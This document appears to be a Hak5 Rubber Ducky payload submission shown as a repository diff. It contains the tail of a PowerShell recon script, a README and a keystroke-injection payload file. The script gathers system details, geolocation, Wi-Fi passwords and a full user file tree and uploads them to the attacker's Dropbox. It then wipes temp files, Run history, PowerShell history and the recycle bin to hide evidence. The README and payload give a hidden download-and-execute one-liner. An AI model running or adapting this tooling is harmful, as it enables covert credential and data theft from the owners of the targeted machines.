echo "==================================================================" >> $env:TMP\$FileName
echo $EM >> $env:TMP\$FileName
echo "" >> $env:TMP\$FileName
echo "GeoLocation:" >> $env:TMP\$FileName
echo "==================================================================" >> $env:TMP\$FileName
echo $GL >> $env:TMP\$FileName
echo "" >> $env:TMP\$FileName
echo "Nearby Wifi:" >> $env:TMP\$FileName
echo "==================================================================" >> $env:TMP\$FileName
echo $NearbyWifi >> $env:TMP\$FileName
echo "" >> $env:TMP\$FileName
$computerSystem.Name >> $env:TMP\$FileName
"==================================================================
Manufacturer: " + $computerSystem.Manufacturer >> $env:TMP\$FileName
"Model: " + $computerSystem.Model >> $env:TMP\$FileName
"Serial Number: " + $computerBIOS.SerialNumber >> $env:TMP\$FileName
"" >> $env:TMP\$FileName
"" >> $env:TMP\$FileName
"" >> $env:TMP\$FileName
"OS:
=================================================================="+ ($computerOs |out-string) >> $env:TMP\$FileName
"CPU:
=================================================================="+ ($computerCpu| out-string) >> $env:TMP\$FileName
"RAM:
==================================================================
Capacity: " + $computerRamCapacity+ ($computerRam| out-string) >> $env:TMP\$FileName
"Mainboard:
=================================================================="+ ($computerMainboard| out-string) >> $env:TMP\$FileName
"Bios:
=================================================================="+ (Get-WmiObject win32_bios| out-string) >> $env:TMP\$FileName
"Local-user:
=================================================================="+ ($luser| out-string) >> $env:TMP\$FileName
"HDDs:
=================================================================="+ ($Hdds| out-string) >> $env:TMP\$FileName
"COM & SERIAL DEVICES:
==================================================================" + ($COMDevices | Out-String) >> $env:TMP\$FileName
"Network:
==================================================================
Computers MAC address: " + $MAC >> $env:TMP\$FileName
"Computers IP address: " + $computerIP.ipaddress[0] >> $env:TMP\$FileName
"Public IP address: " + $computerPubIP >> $env:TMP\$FileName
"RDP: " + $RDP >> $env:TMP\$FileName
"" >> $env:TMP\$FileName
($Network| out-string) >> $env:TMP\$FileName
"W-Lan profiles:
=================================================================="+ ($WLANProfileObjects| Out-String) >> $env:TMP\$FileName
"listeners / ActiveTcpConnections
=================================================================="+ ($listener| Out-String) >> $env:TMP\$FileName
"Current running process:
=================================================================="+ ($process| Out-String) >> $env:TMP\$FileName
"Services:
=================================================================="+ ($service| Out-String) >> $env:TMP\$FileName
"Installed software:
=================================================================="+ ($software| Out-String) >> $env:TMP\$FileName
"Installed drivers:
=================================================================="+ ($drivers| Out-String) >> $env:TMP\$FileName
"Installed videocards:
==================================================================" + ($videocard| Out-String) >> $env:TMP\$FileName
############################################################################################################################################################
# Recon all User Directories
#tree $Env:userprofile /a /f | Out-File -FilePath $Env:tmp\j-loot\tree.txt
tree $Env:userprofile /a /f >> $env:TMP\$FileName
############################################################################################################################################################
# Remove Variables
Remove-Variable -Name computerPubIP,
computerIP,IsDHCPEnabled,Network,Networks,
computerMAC,computerSystem,computerBIOS,computerOs,
computerCpu, computerMainboard,computerRamCapacity,
computerRam,driveType,Hdds,RDP,WLANProfileNames,WLANProfileName,
Output,WLANProfileObjects,WLANProfilePassword,WLANProfileObject,luser,
process,listener,listenerItem,process,service,software,drivers,videocard,
vault -ErrorAction SilentlyContinue -Force
############################################################################################################################################################
# Upload output file to dropbox
$TargetFilePath="/$FileName"
$SourceFilePath="$env:TMP\$FileName"
$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
$authorization = "Bearer " + $DropBoxAccessToken
$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
$headers.Add("Authorization", $authorization)
$headers.Add("Dropbox-API-Arg", $arg)
$headers.Add("Content-Type", 'application/octet-stream')
Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
############################################################################################################################################################
<#
.NOTES
This is to clean up behind you and remove any evidence to prove you were there
#>
# Delete contents of Temp folder
rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
# Delete run box history
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
# Delete powershell history
Remove-Item (Get-PSreadlineOption).HistorySavePath
# Deletes contents of recycle bin
Clear-RecycleBin -Force -ErrorAction SilentlyContinue

100
payloads/library/recon/Tree_of_Knowledge/-RD-ADV-Recon/README.md Normal file
View File

@ -0,0 +1,100 @@
![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# ADV-Recon
A script used to do an advanced level of Recon on the targets computer
## Description
This program enumerates a target PC to include Operating System, RAM Capacity, Public IP, and Email associated with microsoft account.
The GeoLocation (latitude and longitude) of where the script was ran.
The SSID and WiFi password of any current or previously connected to networks.
It determines the last day they changed thier password and how many days ago.
Intel on the system Info, HDDs, network interfaces, TCP connections, Processes, Services, Installed software, drivers, and video card
Along with TREE list of all files in the target computer is gathered and uploaded to your DropBox cloud storage
## Getting Started
### Dependencies
* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10,11
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
```
powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<div><h2>I am Jakoby</h2></div>
<p><br/>
<img src="https://media.giphy.com/media/VgCDAzcKvsR6OM0uWg/giphy.gif" width="50">
<a href="https://github.com/I-Am-Jakoby/">
<img src="https://img.shields.io/badge/GitHub-I--Am--Jakoby-blue">
</a>
<a href="https://www.instagram.com/i_am_jakoby/">
<img src="https://img.shields.io/badge/Instagram-i__am__jakoby-red">
</a>
<a href="https://twitter.com/I_Am_Jakoby/">
<img src="https://img.shields.io/badge/Twitter-I__Am__Jakoby-blue">
</a>
<a href="https://www.youtube.com/c/IamJakoby/">
<img src="https://img.shields.io/badge/YouTube-I_am_Jakoby-red">
</a>
Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/RubberDucky/Payloads/RD-ADV-Recon)
</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [MG](https://github.com/OMG-MG)
<p align="right">(<a href="#top">back to top</a>)</p>

15
payloads/library/recon/Tree_of_Knowledge/-RD-ADV-Recon/payload.txt Normal file
View File

@ -0,0 +1,15 @@
REM Title: ADV-Recon
REM Author: I am Jakoby
REM Description: This payload is meant to do an advanced recon of the targets PC. See README.md file for more details.
REM Target: Windows 10, 11
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl
ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly